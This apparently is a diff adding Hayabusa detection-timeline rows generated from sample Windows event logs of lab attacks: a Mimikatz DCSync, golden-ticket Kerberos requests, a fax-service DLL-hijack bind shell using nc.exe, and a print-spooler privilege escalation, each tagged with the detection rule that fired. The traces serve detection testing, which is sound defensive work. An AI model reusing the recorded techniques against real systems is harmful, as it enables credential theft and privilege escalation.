+2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,../hayabusa-rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
+2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
